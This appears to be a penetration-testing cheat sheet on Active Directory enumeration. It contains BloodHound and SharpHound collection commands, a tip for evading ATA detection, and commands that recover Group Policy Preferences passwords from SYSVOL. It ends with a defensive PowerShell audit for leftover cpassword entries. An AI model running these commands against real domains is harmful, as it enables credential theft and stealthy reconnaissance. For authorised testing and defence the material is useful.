BloodHound Enumeration

BloodHound

Enable Sharp-Hound

Supply data to BloodHound

The generated archive can be uploaded to the BloodHound application.

Remote BloodHound

bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All
bloodhound-python -u user -p password -ns 192.168.1.5 -d hacktor.local -c All

On-Site BloodHound

# Using the exe ingestor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>
.\SharpHound.exe --CollectionMethod All

# Using the PowerShell module ingestor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -LdapUsername <UserName> -LdapPassword <Password> -OutputDirectory <PathToFile>
Invoke-BloodHound -CollectionMethod All,LoggedOn

To avoid detections like ATA

Invoke-BloodHound -CollectionMethod All -ExcludeDC

Neo4j

Start neo4j and the BloodHound UI on the Kali machine and load the zip/json files.

sudo neo4j start

If you find a Windows Server older than 2016, such as 2012 R2 or earlier, you can use these commands to show local users.

This option (Local user) is unavailable on Windows Server 2016.

# Show the password (Get-GPPPassword is from PowerSploit)
Get-GPPPassword -Server PDC.wargrey.mon
# Also show the password from SYSVOL on Windows Server 2012
findstr /S /I cpassword \\PDC\sysvol\wargrey.mon\Policies\*.xml
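
For the defensive side of the SYSVOL search above, this added example (not from the original page and not part of PowerSploit) lists every Group Policy Preferences XML entry that still carries a cpassword attribute so it can be cleaned up, without decrypting or printing the value. The function name Find-GppCpassword, the temporary sample tree and the placeholder attribute value are assumptions constructed for illustration.

```powershell
# Added example: audit a Policies tree for GPP entries that still store a
# cpassword attribute. Values are never decrypted or printed.
function Find-GppCpassword {
    param([Parameter(Mandatory)][string]$Path)   # e.g. \\<DC>\sysvol\<domain>\Policies

    Get-ChildItem -Path $Path -Recurse -Filter *.xml -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_
        try   { $xml = [xml](Get-Content -LiteralPath $file.FullName -Raw) }
        catch { Write-Warning "Skipping unparseable XML: $($file.FullName)"; return }

        # cpassword sits on <Properties>; the parent (User, Task, Drive, ...) holds 'changed'
        foreach ($node in $xml.SelectNodes('//*[@cpassword]')) {
            $parent = $node.ParentNode
            $isElem = $parent -is [System.Xml.XmlElement]
            $account = 'userName', 'runAs', 'accountName', 'username' |
                ForEach-Object { $node.GetAttribute($_) } |
                Where-Object { $_ } | Select-Object -First 1
            [pscustomobject]@{
                File      = $file.FullName
                # LocalName, because .Name would resolve to the element's own 'name' attribute
                Element   = if ($isElem) { $parent.LocalName } else { $node.LocalName }
                Account   = $account
                Changed   = if ($isElem) { $parent.GetAttribute('changed') } else { '' }
                HasSecret = [bool]$node.GetAttribute('cpassword')   # empty attribute = nothing stored
            }
        }
    }
}

# Constructed sample standing in for a SYSVOL Policies tree (placeholder, not a real cpassword)
$root = Join-Path ([System.IO.Path]::GetTempPath()) ("gpp-audit-" + [guid]::NewGuid())
$dir  = New-Item -ItemType Directory -Force -Path (Join-Path $root 'Policies\SAMPLE-GPO\Machine\Preferences\Groups')
@'
<Groups>
  <User name="svc_local" changed="2014-01-01 00:00:00">
    <Properties action="U" userName="svc_local" cpassword="CONSTRUCTED-PLACEHOLDER"/>
  </User>
</Groups>
'@ | Set-Content -LiteralPath (Join-Path $dir.FullName 'Groups.xml')

Find-GppCpassword -Path $root | Format-List
Remove-Item -LiteralPath $root -Recurse -Force
```

Any row with HasSecret set to True identifies a preference item whose stored credential should be removed from the policy and the account's password rotated.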
